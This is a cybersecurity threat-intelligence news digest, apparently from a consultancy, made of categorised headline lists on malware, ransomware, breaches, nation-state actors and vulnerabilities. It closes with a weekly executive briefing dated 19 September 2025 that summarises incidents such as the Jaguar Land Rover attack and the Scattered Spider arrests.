‘Harvest Now, Decrypt Later’ Attacks in the Post-Quantum, AI Era - EE Times Europe

AI-Powered App Exposes User Data, Creates Risk of Supply Chain Attacks | Trend Micro (US)

Critical Security Flaws Grow with AI Use, New Report Shows - Infosecurity Magazine

GenAI is exposing sensitive data at scale - Help Net Security

AI is rewriting the rules of cyber defense - Help Net Security

Generative AI attacks are accelerating at an alarming rate | IT Pro

AI needs ethics to avoid real-world harm - Help Net Security

Kaspersky: RevengeHotels returns with AI-coded malware • The Register

Why AI systems may never be secure, and what to do about it

Google's latest AI safety report explores AI beyond human control | ZDNET

2FA/MFA

Threat actors turning to MFA bypass, USB malware and supply chain attacks | SC Media

Malware

Threat actors turning to MFA bypass, USB malware and supply chain attacks | SC Media

Small business security warning - new malware is spoofing tools such as ChatGPT, Microsoft Office and Google Drive, so be on your guard | TechRadar

DPRK Hackers Use ClickFix to Deliver BeaverTail Malware in Crypto Job Scams

Threat Actors Using Copyright Takedown Claims to Deploy Malware

Beware: GitHub repos distributing Atomic Infostealer on macOS

SystemBC Powers REM Proxy With 1,500 Daily VPS Victims Across 80 C2 Servers

LastPass Warns of Fake Repositories Infecting macOS with Atomic Infostealer

Nimbus Manticore Deploys New Malware Targeting Europe - Check Point Research

Iran-Linked Hackers Target Europe With New Malware

Hacker Deploys 'OVERSTEP' Backdoor in SonicWall Attack

Google: Brickstorm malware used to steal U.S. orgs' data for over a year

BRICKSTORM malware is new Chinese espionage threat | Cybernews

Microsoft warns of new XCSSET macOS malware variant targeting Xcode devs

Lazarus RAT code resurfaces in North Korean IT-worker scams • The Register

RedNovember Hackers Attacking Government and Technology Organizations to Deploy Backdoor - Cyber Security News

New EDR-Freeze tool uses Windows WER to suspend security software

Artificial Intelligence Trained to Attack Hotel Guests

Kaspersky: RevengeHotels returns with AI-coded malware • The Register

Threat Actors Attacking ICS Computers With Malicious Scripts and Phishing Pages

North Korean Hackers Use New AkdoorTea Backdoor to Target Global Crypto Developers

Phishing Campaign Evolves into PureRAT Deployment - Infosecurity Magazine

Bots/Botnets

SystemBC Powers REM Proxy With 1,500 Daily VPS Victims Across 80 C2 Servers

Double the Power: New DDoS From 'Aisuru' Botnet Easily Shatters Record

Cloudflare mitigates largest-ever DDoS attack at 22.2 Tbps

New Botnet Leverages DNS Misconfiguration to Launch Massive Cyber Attack

ShadowV2 Botnet Exploits Misconfigured AWS Docker Containers for DDoS-for-Hire Service

Mobile

Criminals are driving fake cell towers through cities to blast out scam texts | TechSpot

Google just took down 224 malicious apps with 38 million installs in massive SlopAds fraud campaign — how to stay safe | Tom's Guide

Numerous Applications Using Google's Firebase Platform Leaking Highly Sensitive Data - Cyber Security News

Unpatched flaw in OnePlus phones lets rogue apps text messages

Denial of Service/DoS/DDoS

Double the Power: New DDoS From 'Aisuru' Botnet Easily Shatters Record

Cloudflare mitigates largest-ever DDoS attack at 22.2 Tbps

ShadowV2 Botnet Exploits Misconfigured AWS Docker Containers for DDoS-for-Hire Service

Tech Overtakes Gaming as Top DDoS Attack Target, New Gcore Radar Report Finds

Predicting DDoS attacks: How deep learning could give defenders an early warning - Help Net Security

Internet of Things – IoT

EV charging biz zaps customers with data leak scare • The Register

Hackers Exploiting Hikvision Camera Vulnerability to Access Sensitive Information

Data Breaches/Leaks

ChatGPT 'ShadowLeak' Allows Hackers to Steal Emails

‘Harvest Now, Decrypt Later’ Attacks in the Post-Quantum, AI Era - EE Times Europe

Car Giant Stellantis Confirms Third-Party Breach - Infosecurity Magazine

The culture of silence on data breaches has gone too far - Tech Monitor

Vastaamo psychotherapy hack: US citizen charged in latest twist of notorious data breach

Stellantis Data Breach Affects Millions of Car Buyers: Report | Entrepreneur

Cybercriminals are going after law firms' sensitive client data - Help Net Security

EV charging biz zaps customers with data leak scare • The Register

Numerous Applications Using Google's Firebase Platform Leaking Highly Sensitive Data - Cyber Security News

Volvo Group Employee Data Stolen in Ransomware Attack - SecurityWeek

‘Our worst day’: The untold story of the Electoral Commission cyber attack | Computer Weekly

Children's names, pictures and addresses stolen in nursery hack - BBC News

Boyd Gaming discloses data breach after suffering a cyberattack

Organised Crime & Criminal Actors

UK chancellor blames cyberattacks on Russia despite evidence • The Register

Scattered Spider Member Surrenders Amid Shutdown Claims

Teen arrested in UK was a core figure in Scattered Spider’s operations | CyberScoop

Attacker Breakout Time Falls to 18 Minutes - Infosecurity Magazine

Inside the economy built on stolen credentials - Help Net Security

Eurojust Arrests 5 in €100M Cryptocurrency Investment Fraud Spanning 23 Countries

Canada dismantles TradeOgre exchange, seizes $40 million in crypto

$439 million recovered in global financial crime crackdown - Help Net Security

€100M crypto scam busted: Five arrested in Europe-wide operation - Help Net Security

‘I Was a Weird Kid’: Jailhouse Confessions of a Teen Hacker – DataBreaches.Net

Cryptocurrency/Cryptomining/Cryptojacking/NFTs/Blockchain

€100M crypto scam busted: Five arrested in Europe-wide operation - Help Net Security

DPRK Hackers Use ClickFix to Deliver BeaverTail Malware in Crypto Job Scams

North Korean IT workers use fake profiles to steal crypto - Help Net Security

Canada dismantles TradeOgre exchange, seizes $40 million in crypto

North Korean Hackers Use New AkdoorTea Backdoor to Target Global Crypto Developers

Malware 'Game' On Steam Stole $32K From Cancer-Stricken Streamer

Insider Risk and Insider Threats

What to do if your company discovers a North Korean worker in its ranks | CyberScoop

How hiring fraud has become a cybersecurity threat vector | Biometric Update

US employees 'unprepared' for cybersecurity threats - New Study

Lazarus RAT code resurfaces in North Korean IT-worker scams • The Register

Insurance

Cyber attacks cost Europe €300bn in five years, warns Howden | Global Reinsurance

Cyber reinsurers reconsider appetite as market softens :: Insurance Day

When calling for help isn't a claim: A new era for small biz cyber support | Insurance Business America

Supply Chain and Third Parties

Threat actors turning to MFA bypass, USB malware and supply chain attacks | SC Media

Experts Warn of Global Breach Risk from Indian Suppliers - Infosecurity Magazine

Stellantis Data Breach Affects Millions of Car Buyers: Report | Entrepreneur

UNC5221 Uses BRICKSTORM Backdoor to Infiltrate U.S. Legal and Technology Sectors

Airport operations recovering following ransomware attack on Collins checking in software - Aviation Business News

Airport Chaos Shows Human Impact of 3rd-Party Attacks

Jaguar Land Rover Extends Production Pause Again - Infosecurity Magazine

Companies must be better prepared for cyber attacks after Jaguar hack exposes weaknesses | This is Money

Airport cyberattacks: Calls for stronger supply chain security and business resilience - Digital Journal

Airport cyber attacks highlight growing supply chain risk :: Insurance Day

JLR refuses to comment on reports it was uninsured against cyber attack that has forced shutdown | ITV News Central

Survey assesses impact of JLR cyber attack on supply chain - BBC News

Third-party cyber risks among most significant threats to operational resilience: Acrisure - Reinsurance News

Hackers target supply chains’ weak links in growing threat to companies

Tata-owned Jaguar Land Rover pushes to pay struggling suppliers after hack - The Economic Times

Software Supply Chain

5 ways to spot software supply chain attacks and stop worms - before it's too late | ZDNET

CISA urges orgs to review software after ‘Shai-Hulud’ supply chain compromise | The Record from Recorded Future News

Encryption

‘Harvest Now, Decrypt Later’ Attacks in the Post-Quantum, AI Era - EE Times Europe

Linux and Open Source

BlackLock Ransomware Attacking Windows, Linux, and VMware ESXi Environments

Passwords, Credential Stuffing & Brute Force Attacks

How One Bad Password Ended a 158-Year-Old Business

Inside the economy built on stolen credentials - Help Net Security

The Credential Cracking Crisis: Why Role-Based Training Is No Longer Optional | MSSP Alert

Social Media

Trump says Michael Dell is part of the team buying TikTok • The Register

Regulations, Fines and Legislation

What Is Regulatory Compliance? | Definition From TechTarget

Will banning ransom payments help protect UK businesses? - Raconteur

U.K. to introduce mandatory ransomware reporting, raising risk of ‘box-ticking’ compliance | Article | Compliance Week

Cyber threat information law hurtles toward expiration, with poor prospects for renewal | CyberScoop

Banks Brace for Cyber Fight as CISA Faces Expiration

FBI Pushes Back Against Scrutiny Over Cyber Cuts, Vacancies

NIS2 in the Baltics: How Lithuania, Latvia, and Estonia Differ

DoD issues replacement for risk management framework - Breaking Defense

Models, Frameworks and Standards

Has the UK’s Cyber Essentials scheme failed? - Tech Monitor

DoD issues replacement for risk management framework - Breaking Defense

NIS2 in the Baltics: How Lithuania, Latvia, and Estonia Differ

Careers, Working in Cyber and Information Security

Cyber Team Burnout Rivals Healthcare, Expert Says

AI is altering entry-level cyber hiring — and the nature of the skills gap | CSO Online

FBI to CISO: Unconventional Paths to Cyber Success

Law Enforcement Action and Take Downs

Teen arrested in UK was a core figure in Scattered Spider’s operations | CyberScoop

Was the chancellor right to accuse Russia of being behind recent UK cyber attacks? | ITV News

UK chancellor blames cyberattacks on Russia despite evidence • The Register

Scattered Spider Member Surrenders Amid Shutdown Claims

Vastaamo psychotherapy hack: US citizen charged in latest twist of notorious data breach

Suspect arrested in cyberattack on Collins Aerospace check-in software | SC Media

A Massive Telecom Threat Was Stopped Right As World Leaders Gathered at UN Headquarters in New York - SecurityWeek

€100M crypto scam busted: Five arrested in Europe-wide operation - Help Net Security

Canada dismantles TradeOgre exchange, seizes $40 million in crypto

Eurojust Arrests 5 in €100M Cryptocurrency Investment Fraud Spanning 23 Countries

$439 million recovered in global financial crime crackdown - Help Net Security

Judge orders release of teen accused in 2023 casino cyberattacks – DataBreaches.Net

Another alleged Scattered Spider member arrested • The Register

$115 million ransomware hacker arrested over extortion attacks — Scattered Spider alumnus allegedly involved in over 120 computer network intrusions targeting 47 U.S. entities | Tom's Hardware

Las Vegas police arrest minor accused of high-profile 2023 casino attacks | CyberScoop

Alleged Scattered Spider member turns self in to Las Vegas police | The Record from Recorded Future News

Misinformation, Disinformation and Propaganda

Russia Targets Moldovan Election in Disinformation Play


Nation State Actors, Advanced Persistent Threats (APTs), Cyber Warfare, Cyber Espionage and Geopolitical Threats/Activity

Cyber Warfare and Cyber Espionage

RedNovember Hackers Attacking Government and Technology Organizations to Deploy Backdoor - Cyber Security News

Cables no thicker than a hose, our perilous internet could be brought down in a snip | The Independent

UK needs better defences to protect undersea internet cables from Russian sabotage | Computer Weekly

New Chinese Espionage Hacking Group Uncovered

Suspected Chinese spies broke into 'numerous' enterprises • The Register

Nation State Actors

China

Suspected Chinese spies broke into 'numerous' enterprises • The Register

Japan to subsidize undersea cable vessels over 'very serious' national security concerns — will front up to half the cost for $300 million vessels bought by NEC | Tom's Hardware

New Chinese Espionage Hacking Group Uncovered

‘Most Prevalent’ Chinese Hacking Group Targets Tech, Law Firms

Chinese Hackers RedNovember Target Global Governments Using Pantegana and Cobalt Strike

Telecom exec: Salt Typhoon inspiring other hackers to use unconventional techniques | CyberScoop

SEO Poisoning Campaign Tied to Chinese Actor

China’s plans for supersize embassy spark surveillance, hacking fears in London - The Washington Post

Trump says Michael Dell is part of the team buying TikTok • The Register

Dropping China spying charges leaves Commons open to espionage, says Speaker - BBC News

Chinese Cyberspies Hacked US Defense Contractors - SecurityWeek

Russia

Cables no thicker than a hose, our perilous internet could be brought down in a snip | The Independent

UK needs better defences to protect undersea internet cables from Russian sabotage | Computer Weekly

Was the chancellor right to accuse Russia of being behind recent UK cyber attacks? | ITV News

UK chancellor blames cyberattacks on Russia despite evidence • The Register

Turla and Gamaredon Working Together in Fresh Ukrainian Intrusions - SecurityWeek

Russian State Hackers Collaborate in Attacks Against Ukraine - Infosecurity Magazine

Russia Targets Moldovan Election in Disinformation Play

Spanish military jet carrying defence minister hit with 'cyber attack' near Russia - JOE.co.uk

Russia's main airport in St. Petersburg says its website was hacked | The Record from Recorded Future News

Researchers say media outlet targeting Moldova is a Russian cutout | CyberScoop

Iran

Nimbus Manticore Deploys New Malware Targeting Europe - Check Point Research

Iran-Linked Hackers Target Europe With New Malware

Iranian State APT Blitzes Telcos & Satellite Companies

Flushable wipes and Iran: Water treatment facility adds cyberattacks to worry list : NPR

North Korea

What to do if your company discovers a North Korean worker in its ranks | CyberScoop

How hiring fraud has become a cybersecurity threat vector | Biometric Update

Lazarus RAT code resurfaces in North Korean IT-worker scams • The Register

DPRK Hackers Use ClickFix to Deliver BeaverTail Malware in Crypto Job Scams

North Korean IT workers use fake profiles to steal crypto - Help Net Security

Calls grow for cybersecurity control tower - The Korea Times

North Korean Hackers Use New AkdoorTea Backdoor to Target Global Crypto Developers

Other Nation State Actors, Hacktivism, Extremism, Terrorism and Other Geopolitical Threat Intelligence

Hate Groups Seize on Trump’s Antifa Order With Online Threats


Tools and Controls

AI is altering entry-level cyber hiring — and the nature of the skills gap | CSO Online

New EDR-Freeze tool uses Windows WER to suspend security software

Gartner: Preemptive cybersecurity to dominate 50% of security spend by 2030 - Help Net Security

Gartner: CISOs must master agentic AI and turn hype into strategy

Cyber Threat Detection Vendors Pull Out of MITRE Evaluations Test - Infosecurity Magazine

Lean Teams, Higher Stakes: Why CISOs Must Rethink Incident Remediation

5 ways to spot software supply chain attacks and stop worms - before it's too late | ZDNET

10 Common Network Vulnerabilities That Could Put Your Business At Risk - Security Boulevard

North Korean Hackers Use New AkdoorTea Backdoor to Target Global Crypto Developers

Predicting DDoS attacks: How deep learning could give defenders an early warning - Help Net Security

How AI augmentation is revolutionizing penetration testing in cybersecurity | TechRadar

Beware Falling Into the Technology-First Resilience Trap

Anything but safe: Using VPN can bear immense risks – DW – 09/20/2025

DoD issues replacement for risk management framework - Breaking Defense

When calling for help isn't a claim: A new era for small biz cyber support | Insurance Business America

Brit banking group insists security priority in AI rollout • The Register

Other News

Cables no thicker than a hose, our perilous internet could be brought down in a snip | The Independent

UK needs better defences to protect undersea internet cables from Russian sabotage | Computer Weekly

Sky News Daily podcast asks if Britain's suffering a cyber attack 'epidemic' and who could be targeted next | News UK Video News | Sky News

Japan to subsidize undersea cable vessels over 'very serious' national security concerns — will front up to half the cost for $300 million vessels bought by NEC | Tom's Hardware

Why hackers are targeting the world's shipping - BBC News

Cyber attacks impacting trust in online retail - survey

Three in four European companies are hooked on US tech • The Register

The diplomacy of emerging tech and cross–border data sharing

As Incidents Rise, Japan's Cybersecurity Falls Short

Retail at risk: How one alert uncovered a persistent cyberthreat | Microsoft Security Blog

Austria military ditches Microsoft for open-source LibreOffice - here's why | ZDNET

Avoiding service desk exploitation: deconstructing the modern retail attack | TechRadar


Vulnerability Management

Critical Security Flaws Grow with AI Use, New Report Shows - Infosecurity Magazine

10 Common Network Vulnerabilities That Could Put Your Business At Risk - Security Boulevard

How to get free Windows 10 security updates through October 2026 | ZDNET

Microsoft pressured to extend free Windows 10 security updates in most of Europe

Microsoft Accepts to Make Windows 10 Extended Security Updates Free for EU Consumers

Vulnerabilities

Azure Entra ID Flaw Highlights Microsoft IAM Issues

SolarWinds fixes critical Web Help Desk RCE vulnerability (CVE-2025-26399) - Help Net Security

Federal agencies given one day to patch exploited Cisco firewall bugs | The Record from Recorded Future News

Cisco Firewall Zero-Days Exploited in China-Linked ArcaneDoor Attacks - SecurityWeek

Urgent: Cisco ASA Zero-Day Duo Under Attack; CISA Triggers Emergency Mitigation Directive

Cisco's Wave of Zero-Day Bugs Targets Firewalls, IOS

Hacker Deploys 'OVERSTEP' Backdoor in SonicWall Attack

Microsoft Patches Critical Entra ID Flaw Enabling Global Admin Impersonation Across Tenants

SonicWall Updates SMA 100 Appliances to Remove Overstep Malware - SecurityWeek

Two New Supermicro BMC Bugs Allow Malicious Firmware to Evade Root of Trust Security

Microsoft finally squashed this major Windows 11 24H2 bug - one year later | ZDNET

Critical Vulnerability in Salesforce AgentForce Exposed - Infosecurity Magazine

Salesforce Patches Critical ForcedLeak Bug Exposing CRM Data via AI Prompt Injection

Battered by cyberattacks, Salesforce faces a trust problem - and a potential class action lawsuit | ZDNET

Fortra Patches Critical GoAnywhere MFT Vulnerability - SecurityWeek

Final Chrome 140 update fixes more security vulnerabilities | PCWorld

Hackers Exploit Pandoc CVE-2025-51591 to Target AWS IMDS and Steal EC2 IAM Credentials

Two Critical Flaws Uncovered in Wondershare RepairIt Exposing User Data and AI Models

Unpatched flaw in OnePlus phones lets rogue apps text messages

CISA says hackers breached federal agency using GeoServer exploit

Nation-State hackers exploit Libraesva Email Gateway flaw


Sector Specific

Industry specific threat intelligence reports are available.

Contact us to receive tailored reports specific to the industry/sector and geographies you operate in.

·       Automotive

·       Construction

·       Critical National Infrastructure (CNI)

·       Defence & Space

·       Education & Academia

·       Energy & Utilities

·       Estate Agencies

·       Financial Services

·       FinTech

·       Food & Agriculture

·       Gaming & Gambling

·       Government & Public Sector (including Law Enforcement)

·       Health/Medical/Pharma

·       Hotels & Hospitality

·       Insurance

·       Legal

·       Manufacturing

·       Maritime & Shipping

·       Oil, Gas & Mining

·       OT, ICS, IIoT, SCADA & Cyber-Physical Systems

·       Retail & eCommerce

·       Small and Medium Sized Businesses (SMBs)

·       Startups

·       Telecoms

·       Third Sector & Charities

·       Transport & Aviation

·       Web3


Contact us to help assess where your risks lie and to ensure you are doing all you can do to keep you and your business secure.

Look out for our ‘Cyber Tip Tuesday’ video blog and on our YouTube channel.

You can also follow us on Facebook, Twitter and LinkedIn.


Links to external articles are provided for general interest and awareness only. Linking to or reposting external content does not constitute endorsement of or by any organisation, service, or product. We do not control and are not responsible for the content, security, or availability of external websites or links. Full credit is given to the original authors and sources. E&OE.


Black Arrow Cyber Threat Intelligence Briefing 19 September 2025

Black Arrow Cyber Threat Intelligence Briefing 19 September 2025:

-Jaguar Land Rover Extends Shutdown After Cyber Attack by Another Week

-Two Scattered Spider Teens Charged over Attack on London’s Transport Network

-Scattered Spider Resurfaces with Financial Sector Attacks Despite Retirement Claims

-It Doesn’t Take a Genius to Be a Cybercriminal, and Open Source Ransomware Is Making It Easier than Ever

-New Android Malware Steals Your Money Then Installs Ransomware

-Disrupted Phishing Service Was After Microsoft 365 Credentials

-AI Threats Top Focus at London Financial Services Summit

-Shadow AI Is Breaking Corporate Security from Within

-Global Hiring Risks: Identity Fraud and Screening Trends

-Cyber Skills Shortage Forces 64% of EMEA Organisations into Risky Security Shortcuts

-70% of Security Leaders Say Internal Misalignment Creates More Chaos Than Threat Actors

-The Secret Psychological Cost of Cyber Attacks

-Russia’s Hybrid Tactics Raise Alarm in EU

Welcome to this week’s Black Arrow Cyber Threat Intelligence Briefing – a weekly digest, collated and curated by our cyber experts to provide senior and middle management with an easy to digest round up of the most notable threats, vulnerabilities, and cyber related news from the last week.

Executive Summary

This week’s review highlights the growing complexity of cyber threats and the leadership response required.

Ransomware and phishing remain dominant, with major disruptions at Jaguar Land Rover and Transport for London. Criminal groups such as Scattered Spider are evolving, using AI-driven social engineering, while open-source ransomware and hybrid malware lower the barrier for attackers.

AI is both a defensive tool and a risk factor: financial services leaders warn of deepfake-enabled fraud, while unapproved AI use within organisations is driving compliance breaches and supply chain exposure. Internal weaknesses amplify these risks: research shows poor incident coordination and skills shortages create more disruption than attackers, while identity fraud in hiring and the psychological toll on staff add long-term challenges. Geopolitical tensions further complicate the landscape, with Russia escalating hybrid tactics across Europe.

Clear Board-level ownership and governance, a proactive investment in a security culture, and regular rehearsals of cyber incident management are essential to resilience. Contact us for impartial and objective leadership guidance on strengthening your organisation’s defences.


Top Cyber Stories of the Last Week

Jaguar Land Rover Extends Shutdown After Cyber Attack by Another Week

Jaguar Land Rover has extended its production shutdown for another week following a major cyber attack that disrupted its global operations. The company, which employs around 39,000 staff and generates annual revenue exceeding £29 billion, confirmed that attackers stole company data and forced a halt to manufacturing. A group of criminals linked to well-known extortion gangs has claimed responsibility, citing the use of stolen credentials and ransomware. JLR stated it is still investigating the incident and carefully planning a phased restart, underlining the severe operational and reputational risks posed by targeted cyber attacks on organisations.

https://www.bleepingcomputer.com/news/security/jaguar-land-rover-extends-shutdown-after-cyberattack-by-another-week/

Two Scattered Spider Teens Charged over Attack on London’s Transport Network

Two young men have been charged in connection with last year’s cyber attack on Transport for London, which disrupted services, exposed customer data, and cost the organisation tens of millions. Authorities allege the pair are linked to a wider criminal group and note that one also faces charges relating to US healthcare systems. The National Crime Agency stressed the attack demonstrated the serious risks posed to critical national infrastructure, highlighting the need for sustained disruption of such groups. Transport for London has since strengthened its security measures and continues to support the investigation.

https://www.theregister.com/2025/09/18/two_teens_charged_in_tfl_case/

Scattered Spider Resurfaces with Financial Sector Attacks Despite Retirement Claims

Scattered Spider, the cyber crime group linked with attacks including Jaguar Land Rover and retailer Marks and Spencer, and which recently claimed to have disbanded, has resurfaced with fresh attacks on the financial sector. Researchers report the group gained access by tricking an executive into resetting their password, then moved deeper into systems to steal sensitive data and bypass security controls. Evidence suggests overlap with other groups such as ShinyHunters, which are now exploiting artificial intelligence to run highly convincing voice scams at scale. The group’s apparent retirement may have been a smokescreen to evade law enforcement, and organisations are urged to remain vigilant as such actors often regroup under new identities.

https://thehackernews.com/2025/09/scattered-spider-resurfaces-with.html

It Doesn’t Take a Genius to Be a Cybercriminal, and Open Source Ransomware Is Making It Easier than Ever

A recent study has highlighted that open-source ransomware is lowering the barrier for criminals, enabling even those with limited technical ability to launch attacks. One group, named Yurei, successfully targeted a food manufacturer by slightly modifying an existing ransomware tool. Their approach combined data theft with encryption, demanding payment both to restore access and to prevent data being leaked or sold. Although flaws in the reused code allow for some recovery, the research found that low-effort attacks can still succeed. With around 80% of ransomware now using artificial intelligence, the risk to organisations continues to rise.

https://www.techradar.com/pro/security/it-doesnt-take-a-genius-to-be-a-cybercriminal-and-open-source-ransomware-is-making-it-easier-than-ever

New Android Malware Steals Your Money Then Installs Ransomware

Security researchers have identified a new Android malware, named RatOn, that merges banking fraud with ransomware in a single attack. The malware can autonomously steal personal identification numbers, drain bank accounts and crypto wallets, then lock the device and demand payment to restore access. This evolution highlights how criminals are adapting to stronger banking security by combining multiple methods of extortion. Distribution often occurs through fake apps that mimic trusted platforms such as TikTok, underlining the need for vigilance when downloading apps and ensuring protective features like Google Play Protect remain enabled.

https://www.pcworld.com/article/2907681/beware-new-android-malware-steals-your-money-then-installs-ransomware.html

Disrupted Phishing Service Was After Microsoft 365 Credentials

Microsoft and Cloudflare have taken down a large-scale phishing service called RaccoonO365, which sold ready-made kits to steal Microsoft 365 login details. Since July 2024 the operation compromised at least 5,000 accounts across 94 countries, with criminals then able to access company files, emails, and cloud storage for fraud, extortion, or wider attacks. The service was sold for about $355 a month and could send up to 9,000 fraudulent emails daily. Authorities shut down 338 associated websites and arrested a key suspect, significantly disrupting the operation and raising costs for its criminal users.

https://www.malwarebytes.com/blog/news/2025/09/disrupted-phishing-service-was-after-microsoft-365-credentials

AI Threats Top Focus at London Financial Services Summit

The London Financial Services Cyber Security Summit underlined that resilience has become a regulatory and strategic imperative for the sector. Senior leaders warned that artificial intelligence is being used both to strengthen defences and to fuel more sophisticated cyber attacks such as deepfake-enabled fraud. Insider threats and weak oversight of staff with financial authority remain a major risk. Regulators emphasised that compliance should be seen not only as a legal duty but also as a competitive advantage. Across the summit, the message was clear: collaboration, cultural change and proactive investment are critical to safeguarding long-term stability.

https://www.inforisktoday.com/ai-threats-top-focus-at-london-financial-services-summit-a-29474

Shadow AI Is Breaking Corporate Security from Within

The latest State of Information Security Report from IO shows that organisations face mounting risks from artificial intelligence, compliance demands, and supply chain vulnerabilities. Nearly eight in ten firms adopted AI last year, yet more than a third of employees are using tools without approval, raising the risk of data leaks and regulatory breaches. Data breaches and compliance pressures are prevalent, with 71% of firms fined in the past year and nearly a third paying penalties above £250,000. Meanwhile, 61% reported supply chain incidents, driving increased investment in oversight, although smaller suppliers remain a persistent weak link.

https://www.helpnetsecurity.com/2025/09/18/ai-attack-surface-risks/

Global Hiring Risks: Identity Fraud and Screening Trends

HireRight’s 2025 Global Benchmark Report highlights rising risks of identity fraud in hiring, with one in six companies reporting confirmed cases, yet fewer than 80% include identity verification in their standard screening. Most organisations use the same approach regardless of whether the employee will work remotely, which is particularly significant given the prevalence of North Korean operatives infiltrating organisations as remote IT workers. Discrepancies in candidate histories remain common, with over three-quarters of businesses finding issues in the past year. These trends underline the need for closer collaboration between HR, compliance and cyber security leaders to reduce fraud and reputational risks.

https://www.helpnetsecurity.com/2025/09/18/global-hiring-risks-2025/

Cyber Skills Shortage Forces 64% of EMEA Organisations into Risky Security Shortcuts

New research shows that 64% of organisations across Europe, the Middle East and Africa are forced to take risky shortcuts due to a shortage of cyber security skills. In the UK, two thirds of organisations report gaps, with more than half describing the impact as severe. Only a quarter of IT leaders believe they have the right expertise in-house, leading to delays in projects and difficulties meeting compliance rules. The shortage spans technical, operational and leadership roles, with high hiring costs and limited candidates deepening the challenge and creating both immediate and long-term risks to resilience and growth.

https://www.businesswire.com/news/home/20250915261659/en/Cyber-Skills-Shortage-Forces-64-of-EMEA-Organisations-into-Risky-Security-Shortcuts

70% of Security Leaders Say Internal Misalignment Creates More Chaos Than Threat Actors

Cytactic’s 2025 report highlights that internal breakdowns, not external attackers, are the greatest barrier to effective cyber attack response. 70% of leaders said poor coordination created more disruption than the breach itself, with many citing unclear authority and strained CEO-CISO relations. Over half faced incidents they had never rehearsed, despite most recognising the value of simulations. Boards were also seen as underestimating the urgency of response. The report stresses the need for clearer leadership roles, better cross-team communication, and investment in AI and rehearsal exercises to strengthen resilience when breaches occur.

https://www.prnewswire.com/news-releases/70-of-security-leaders-say-internal-misalignment-creates-more-chaos-than-threat-actors-cytactics-2025-state-of-cybersecurity-incident-response-management-cirm-report-302560507.html

The Secret Psychological Cost of Cyber Attacks

Recent research shows that two in five UK small and medium businesses have lost money to fraud, with phishing being one of the most common forms of attack. While financial loss often takes the spotlight, the hidden impact on staff can be just as damaging. Employees caught in these scams may experience guilt, fear and a loss of confidence, which can harm both performance and wellbeing. A culture of blame makes matters worse by discouraging prompt reporting. By fostering openness, empathy and practical training, leaders can strengthen resilience and reduce both the financial and psychological cost of attacks.

https://www.siliconrepublic.com/enterprise/cyberattacks-money-data-psychology-shame-victim-scam-support

Russia’s Hybrid Tactics Raise Alarm in EU

Russian hybrid tactics are escalating, combining cyber attacks, disinformation, and physical incursions, such as the recent drone violations of Polish airspace. In response, Poland has pressed for stronger air defence, increased allied presence, and tougher sanctions. The EU is supporting these efforts through its €150 billion SAFE programme, with €43.7 billion allocated to Poland for military strengthening. With large-scale Russian and Belarusian military exercises planned, Poland has temporarily closed its border with Belarus, warning of destabilisation attempts. Leaders stress that resilience, investment, and unity are vital to counter these threats and maintain regional security.

https://wbj.pl/russias-hybrid-tactics-raise-alarm-in-eu/post/147240



Threats

Ransomware, Extortion and Destructive Attacks

Beware! New Android malware steals your money then installs ransomware | PCWorld

Scattered Spider hackers return to hit more victims - despite retirement claims | TechRadar

Did Scattered Spider Scatter? Cyber Experts Are Skeptical | Security Magazine

Scattered LAPSUS$ Hunters Announces Closure - GovInfoSecurity

What Are The Takeaways from The Scattered LAPSUS$ Hunters Statement?

HybridPetya ransomware dodges UEFI Secure Boot • The Register

Hackers behind Jaguar Land Rover announce their 'retirement' – should we believe them? | IT Pro

It doesn't take a genius to be a cybercriminal - and open source ransomware is making it easier than ever | TechRadar

Open-Source Ransomware Tools on GitHub Fuel AI-Driven Cybercrime Surge

How ransomware is changing to target businesses in 2025 | IT Pro

Ransomware crims broke in, found recovery codes in plaintext • The Register

Ransomware attackers used incorrectly stored recovery codes to disable EDR agents - Help Net Security

Ransomware and the UK’s proposed ban on payments: a measured legal response or risk amplifier? | TechRadar

UK arrests 'Scattered Spider' teens linked to Transport for London hack

Ransomware TMZ: More Than a Year of Leaks, Lies and Betrayals | MSSP Alert

Ransomware Victims

Scattered Spider Resurfaces With Financial Sector Attacks Despite Retirement Claims

Scattered Spider gang feigns retirement, breaks into bank • The Register

Jaguar Land Rover suppliers 'face bankruptcy' due to hack crisis - BBC News

Cyber attack could be costing JLR £5 million a day | Autocar

JLR extends production shutdown to next week amid cyber attack chaos | TheBusinessDesk.com

JLR still unable to restart production as MPs call for government help | Autocar

VC firm Insight Partners says thousands of staff and limited partners had personal data stolen in a ransomware attack | TechCrunch

JLR ‘cyber shockwave ripping through UK industry’ as supplier share price plummets by 55% – DataBreaches.Net

JLR supply chain staff told to apply for universal credit, union says - BBC News

VC giant Insight Partners warns thousands after ransomware breach

ShinyHunters claims 1.5 billion Salesforce records stolen in Drift hacks

FBI Issues Salesforce Instance Warning Over 'ShinyHunters' Data Theft | Salesforce Ben

BMW claimed by Everest gang: Have luxury brands become the latest ransomware trend? | Cybernews

UK arrests 'Scattered Spider' teens linked to Transport for London hack

INC ransom group claimed the breach of Panama’s Ministry of Economy and Finance

Tiffany Data Breach Impacts Thousands of Customers - SecurityWeek

UK telco Colt’s cyberattack recovery seeps into November • The Register

ShinyHunters Attack National Credit Information Center of Vietnam

KillSec Ransomware Hits Brazil's Healthcare Sector

Qilin ransomware gang claims attack on Orleans Parish Sheriff's Office

Survival Flight reports second cybersecurity incident in less than a year – DataBreaches.Net

Phishing & Email Based Attacks

Scary results as study shows AI chatbots excel at phishing tactics - Cryptopolitan

Disrupted phishing service was after Microsoft 365 credentials | Malwarebytes

Threat Actors Leverage Several RMM Tools in Phishing Attack to Maintain Remote Access

Attackers Up Their Game with Ultra-Realistic PDF Invoice Lures, HP Finds | WebWire

Beware Email Scams Seeking Feedback on the UK's Emergency Alerts Test - ISPreview UK

This North Korean Phishing Attack Used ChatGPT's Image Generation

Phishing campaign targets Rust developers - Help Net Security

RaccoonO365 Phishing Network Dismantled as Microsoft, Cloudflare Take Down 338 Domains

Other Social Engineering

Why You Should Never Scan A QR Code To Pay For Parking

Password1: how scammers exploit variations of your logins | Money | The Guardian

Cybercriminals Have a Weird New Way to Target You With Scam Texts | WIRED

Fraud, Scams and Financial Crime

Why You Should Never Scan A QR Code To Pay For Parking

Cybercriminals Have a Weird New Way to Target You With Scam Texts | WIRED

Google nukes 224 Android malware apps behind massive ad fraud campaign

AI made crypto scams far more dangerous - Help Net Security

Beware Email Scams Seeking Feedback on the UK's Emergency Alerts Test - ISPreview UK

The Boots Bandits: How 'points thieves' are stealing loyalty card rewards from British shoppers in £300million black market | Daily Mail Online

